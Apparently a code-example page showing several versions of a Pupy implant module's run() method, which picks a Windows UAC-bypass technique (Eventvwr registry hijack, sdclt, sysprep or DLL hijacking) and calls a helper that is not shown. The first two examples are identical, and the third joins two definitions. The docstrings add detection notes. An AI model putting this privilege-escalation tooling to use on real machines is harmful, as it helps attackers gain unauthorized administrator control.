Exemple #1
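    def run(self, args):
        """Select a UAC-bypass technique (MITRE ATT&CK T1548.002) and hand off to ``bypassuac``.

        Nothing is attempted when the implant runs as a 32-bit process on a
        64-bit OS; two error lines are reported instead.  Otherwise the
        Eventvwr path is taken when ``args.method`` is ``"eventvwr"``, or when
        no method was given and the client reports release ``'10'``.  Every
        other value of ``args.method`` falls through to the sysprep path.

        Args:
            args: parsed module arguments; only ``args.method`` is read here.

        Defender note: the status strings name the observable behaviour
        (eventvwr.exe plus registry hijacking; sysprep plus process
        injection).  Alerting on eventvwr.exe spawning unexpected elevated
        children is the usual detection for the first path.  The mechanics
        live in the ``bypassuac`` helper, which is not shown here.
        """
        # The original mixed a space-indented ``def`` line with a tab-indented
        # body, which Python 3 rejects; the body now uses spaces throughout.
        if self.client.desc['proc_arch'] == '32bit' and self.client.conn.modules['pupwinutils.processes'].is_x64_architecture():
            self.error("You are using a x86 process while the os architecture is x64")
            self.error("Migrate to a x64 process before trying to bypass UAC")
            return

        # ``is None`` rather than ``== None``: identity is the correct test for the singleton.
        use_eventvwr = args.method == "eventvwr" or (
            self.client.desc['release'] == '10' and args.method is None
        )

        if use_eventvwr:
            self.success("Trying to bypass UAC with Eventvwr method (UAC Bypass using eventvwr.exe and Registry Hijacking), wind7-10 targets...")
            bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
            bypassUasModule.bypassuac_through_EventVwrBypass()
        else:
            self.success("Trying to bypass UAC with sysprep method (bypass UAC using the trusted publisher certificate through process injection), wind7-8.1 targets...")
            bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
            bypassUasModule.bypassuac_through_PowerSploitBypassUAC()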
Exemple #2
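    def run(self, args):
        """Select a UAC-bypass technique (MITRE ATT&CK T1548.002) and hand off to ``bypassuac``.

        Nothing is attempted when the implant runs as a 32-bit process on a
        64-bit OS; two error lines are reported instead.  Otherwise the
        Eventvwr path is taken when ``args.method`` is ``"eventvwr"``, or when
        no method was given and the client reports release ``'10'``.  Every
        other value of ``args.method`` falls through to the sysprep path.

        Args:
            args: parsed module arguments; only ``args.method`` is read here.

        Defender note: the status strings name the observable behaviour
        (eventvwr.exe plus registry hijacking; sysprep plus process
        injection).  Alerting on eventvwr.exe spawning unexpected elevated
        children is the usual detection for the first path.  The mechanics
        live in the ``bypassuac`` helper, which is not shown here.
        """
        # The original mixed a space-indented ``def`` line with a tab-indented
        # body, which Python 3 rejects; the body now uses spaces throughout.
        if self.client.desc['proc_arch'] == '32bit' and self.client.conn.modules['pupwinutils.processes'].is_x64_architecture():
            self.error("You are using a x86 process while the os architecture is x64")
            self.error("Migrate to a x64 process before trying to bypass UAC")
            return

        # ``is None`` rather than ``== None``: identity is the correct test for the singleton.
        use_eventvwr = args.method == "eventvwr" or (
            self.client.desc['release'] == '10' and args.method is None
        )

        if use_eventvwr:
            self.success("Trying to bypass UAC with Eventvwr method (UAC Bypass using eventvwr.exe and Registry Hijacking), wind7-10 targets...")
            bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
            bypassUasModule.bypassuac_through_EventVwrBypass()
        else:
            self.success("Trying to bypass UAC with sysprep method (bypass UAC using the trusted publisher certificate through process injection), wind7-8.1 targets...")
            bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
            bypassUasModule.bypassuac_through_PowerSploitBypassUAC()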
Exemple #3
    def run(self, args):
        """Choose between the registry-hijack and DLL-hijack UAC bypass paths.

        The remote ``pupwinutils.security`` module is asked first whether the
        current user can obtain admin access; if not, an error is reported and
        nothing else happens.  With no ``args.method`` the choice follows the
        client's reported release (``'10'`` -> Eventvwr, anything else -> DLL
        hijacking).  An explicit ``"eventvwr"`` selects the registry path and
        any other value selects DLL hijacking.

        Args:
            args: parsed module arguments; only ``args.method`` is read here.

        Defender note: the precondition checked here is membership of the
        local Administrators group, so keeping day-to-day accounts out of that
        group removes the starting point for both paths (ATT&CK T1548.002).
        """
        # A bypass is only meaningful for a user who could elevate anyway.
        security = self.client.conn.modules["pupwinutils.security"]
        if not security.can_get_admin_access():
            self.error('Your are not on the local administrator group.')
            return

        # The helper is built before the technique is chosen, as in the original.
        bypassUasModule = bypassuac(self, rootPupyPath=ROOT)

        # An explicit method wins; otherwise fall back on the OS release.
        if args.method:
            use_registry = args.method == "eventvwr"
        else:
            use_registry = self.client.desc['release'] == '10'

        if use_registry:
            self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
            bypassUasModule.bypassuac_through_EventVwrBypass()
        else:
            # Invoke-BypassUAC.ps1 picks its technique from the Windows version
            # (Sysprep for Windows 7/2008, NTWDBLIB.dll for Windows 8/2012).
            self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
            bypassUasModule.bypassuac_through_PowerSploitBypassUAC()
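    def run(self, args):
        """Choose one of three UAC bypass paths and hand off to ``bypassuac``.

        The remote ``pupwinutils.security`` module is asked first whether the
        current user can obtain admin access; if not, an error is reported and
        nothing else happens.  With no ``args.method`` the choice follows the
        client's reported release (``'10'`` -> app paths, anything else -> DLL
        hijacking).  Recognised explicit values are ``"appPaths"``,
        ``"eventvwr"`` and ``"dll_hijacking"``.

        The original silently did nothing for any other value of
        ``args.method`` because no flag was set.  That case now reports an
        error and returns before the helper is constructed.

        Args:
            args: parsed module arguments; only ``args.method`` is read here.

        Defender note: the auto-elevating binaries named in the status strings
        (sdclt.exe, eventvwr.exe) spawning unexpected elevated children are
        the observable signal for the first two paths (ATT&CK T1548.002).
        Keeping day-to-day accounts out of the local Administrators group
        removes the precondition checked below.
        """
        # check if a UAC Bypass can be done
        if not self.client.conn.modules["pupwinutils.security"].can_get_admin_access():
            self.error('Your are not on the local administrator group.')
            return

        # choose methods depending on the OS Version
        method = args.method
        if not method:
            method = "appPaths" if self.client.desc['release'] == '10' else "dll_hijacking"

        if method not in ("appPaths", "eventvwr", "dll_hijacking"):
            # Fail loudly instead of falling through every branch with no output.
            self.error("Unknown method '%s' (expected appPaths, eventvwr or dll_hijacking)" % method)
            return

        bypassUasModule = bypassuac(self, rootPupyPath=ROOT)

        if method == "appPaths":
            self.success("Trying to bypass UAC using the 'app paths'+'sdclt.exe' method, wind10 targets ONLY...")
            bypassUasModule.bypassuac_through_appPaths()
        elif method == "eventvwr":
            self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
            bypassUasModule.bypassuac_through_eventVwrBypass()
        else:
            # Invoke-BypassUAC.ps1 picks its technique from the Windows version
            # (Sysprep for Windows 7/2008, NTWDBLIB.dll for Windows 8/2012).
            self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
            bypassUasModule.bypassuac_through_powerSploitBypassUAC()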